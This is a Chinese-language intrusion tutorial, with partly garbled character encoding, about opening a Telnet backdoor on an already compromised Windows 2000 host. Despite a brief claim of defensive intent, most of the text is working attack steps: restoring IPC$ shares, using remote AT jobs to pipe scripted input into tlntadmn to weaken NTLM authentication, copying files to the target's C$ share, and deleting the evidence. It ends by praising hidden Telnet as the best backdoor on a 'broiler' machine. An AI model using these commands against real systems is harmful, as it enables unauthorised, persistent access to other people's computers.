對(duì)于Telnet的使用中，它的入侵問(wèn)題一直都令我們擔(dān)憂。那么如何進(jìn)行保護(hù)和防范呢？這里我們需要了解攻擊的原理。下面我們就介紹一下Telnet服務(wù)被入侵的過(guò)程吧。這樣也可以讓我們對(duì)防止這類(lèi)事情有所幫助。在入侵中,得到管理員帳號(hào)之后,很多事情顯得輕而易舉,可有時(shí)候幸運(yùn)之神并不是總落在你身上的,這不,剛剛溢出成功內(nèi)網(wǎng)的機(jī)器,本想用IPC$連接上去,竟發(fā)現(xiàn)"網(wǎng)絡(luò)路徑不存在",看來(lái)有必要先運(yùn)行一次:net share /y 啟動(dòng)共享服務(wù),顯示成功后,終于連接搞定了!不過(guò)在接下來(lái)的開(kāi)Telnet服務(wù)中便遇到了NTLM認(rèn)證的問(wèn)題,搬出自己習(xí)慣使用的工具:不依賴(lài)于IPC共享的VBS腳本,連忙傳上去.運(yùn)行之后卻顯示不成功,納悶了.只能驅(qū)貓上線,繼續(xù)我那無(wú)期的學(xué)習(xí)之路了,半晌終于找到一篇關(guān)開(kāi)打開(kāi)Telnet的教學(xué),在再三測(cè)試后終于成功打開(kāi)了那部機(jī)器的Telnet,經(jīng)驗(yàn)不敢獨(dú)享,寫(xiě)出來(lái)與大家共賞.

我們知道WIN2000中自帶Tlntadmn命令,它可以更改Telnet的端口、運(yùn)行參數(shù)、最大登錄人數(shù)等等,可惜討厭的NTLM認(rèn)證會(huì)讓我們遠(yuǎn)程無(wú)法登陸,現(xiàn)在我們需要的是擺脫NTLM認(rèn)證的問(wèn)題:

方法1:手動(dòng)修改Tlntadmn:

我們按下面的命令直接在本地CMD下操作:

C:\WINNT\system32>tlntadmn.exe  
Microsoft (R) Windows 2000 (TM) (內(nèi)部版本號(hào) 2195)  
Telnet Server Admin (Build 5.00.99201.1) 

請(qǐng)?jiān)谙铝羞x項(xiàng)中選擇一個(gè):

0) 退出這個(gè)應(yīng)用程序

1) 列出當(dāng)前用戶

2) 結(jié)束一個(gè)用戶的會(huì)話 ...

3) 顯示 / 更改注冊(cè)表設(shè)置 ...

4) 開(kāi)始服務(wù)

5) 停止服務(wù)

請(qǐng)鍵入一個(gè)選項(xiàng)的號(hào)碼 [0 - 5] 以選擇該選項(xiàng):

選3回車(chē)進(jìn)入設(shè)置,進(jìn)入如下子界面:

請(qǐng)?jiān)谙铝羞x項(xiàng)中選擇一個(gè):

0) 退出這個(gè)菜單

1) AllowTrustedDomain

2) AltKeyMapping

3) DefaultDomain

4) DefaultShell

5) LoginScript

6) MaxFailedLogins

7) NTLM

8) TelnetPort

請(qǐng)鍵入一個(gè)選項(xiàng)的號(hào)碼 [0 - 8] 以選擇該選項(xiàng):

我們選7,回車(chē)進(jìn)入設(shè)置:NTLM的當(dāng)前值=2,我們給它設(shè)置成１就可以了.設(shè)置完成后重啟Telnet服務(wù):net stop Telnet、net start Telnet,再在本地連接23端口,輸入管理員帳號(hào)密碼就OK了!手動(dòng)修改NTLM的方法就這么簡(jiǎn)單,在平時(shí)入侵的時(shí)候,如果有３３８９等遠(yuǎn)程連接方式,推薦大家使用這樣的方法去修改.#p#

方法2:利用腳本修改Tlntadmn:

有時(shí)我們出于特殊原因不要求立即停止Telnet服務(wù)或是變更NTLM模式,這時(shí)我們必須借助AT命令:at \\IP time 程序名,但實(shí)際上操作的話我們會(huì)發(fā)現(xiàn):類(lèi)似tlntadmn這樣的程序是控制臺(tái)的一個(gè)交互式工具,其參數(shù)設(shè)置并不能很好的被AT命令所調(diào)用,我們應(yīng)如何處理呢?換句話說(shuō)在沒(méi)有３３８９等遠(yuǎn)程登陸的模式下,如何給方便的給對(duì)方開(kāi)啟Telnet服務(wù)呢?我們可以將命令寫(xiě)入一個(gè)txt文件,再加以調(diào)用.寫(xiě)入的命令請(qǐng)按照下面的順序:

停止服務(wù)(5)->更改設(shè)置(3)->NTLM(7)->確認(rèn)更改(y)->修改NTLM當(dāng)前值(0)->再次確認(rèn)(y)->退出菜單(0)->啟動(dòng)服務(wù)(4)->退出程序(0)

在方法１中我們知道在每個(gè)選擇后面都要回車(chē)確認(rèn)運(yùn)行,所以我們要模擬操作寫(xiě)入的數(shù)據(jù)應(yīng)是:

5(回車(chē))3(回車(chē))7(回車(chē))y(回車(chē))0(回車(chē))y(回車(chē))0(回車(chē))4(回車(chē))0(回車(chē))

現(xiàn)在我們有二種思路接下去做:一是直接在被入侵機(jī)器的CMD上制作txt文件以供調(diào)用;二是在本地生成txt再上傳到被入侵機(jī)器以供調(diào)用.

下面我們看他們分別是如何實(shí)現(xiàn)的:

1．直接在被入侵機(jī)器的CMD上制作txt文件以供調(diào)用.依次在cmd下如此運(yùn)行命令:

at \\ip time "echo 5 > c:\Telnet.txt"  
at \\ip time "echo 3 >> c:\Telnet.txt"  
at \\ip time "echo 7 >> c:\Telnet.txt"  
at \\ip time "echo y >> c:\Telnet.txt"  
at \\ip time "echo 0 >> c:\Telnet.txt"  
at \\ip time "echo y >> c:\Telnet.txt"  
at \\ip time "echo 0 >> c:\Telnet.txt"  
at \\ip time "echo 4 >> c:\Telnet.txt"  
at \\ip time "echo 0 >> c:\Telnet.txt"  
at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\Telnet.txt"  
at \\ip time "del c:\Telnet.txt /f" 

只須按上面的命令行一行行打入運(yùn)行就可以了.效果與方法１是等同的.

2．在本地生成txt再上傳到被入侵機(jī)器以供調(diào)用.在本地機(jī)器上做一個(gè)Telnet.txt文件,內(nèi)容如下:

5 3 7 y 0 y 0 4 0

注意每一行都要加回車(chē),然后將這個(gè)文件上傳到被入侵機(jī)器的C:盤(pán)下:

copy Telnet.txt \\ip\c$

再設(shè)置在某時(shí)間內(nèi)啟動(dòng)并刪除巳上傳文件: at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\Telnet.txt" at \\ip time "del c:\Telnet.txt /f"

很簡(jiǎn)單的dos管道重定向原理,這樣就完成tlntadmn的交互過(guò)程.效果與方法A是等同的,簡(jiǎn)單那吧?

Tlntadmn在處理Telnet上顯得異常強(qiáng)大,在入侵過(guò)程中如果能熟練應(yīng)用它,那么開(kāi)放Telnet服務(wù)將顯得輕而易舉,當(dāng)然,隱蔽的Telnet服務(wù)也就是肉雞上最好的后門(mén)了!你學(xué)會(huì)了嗎?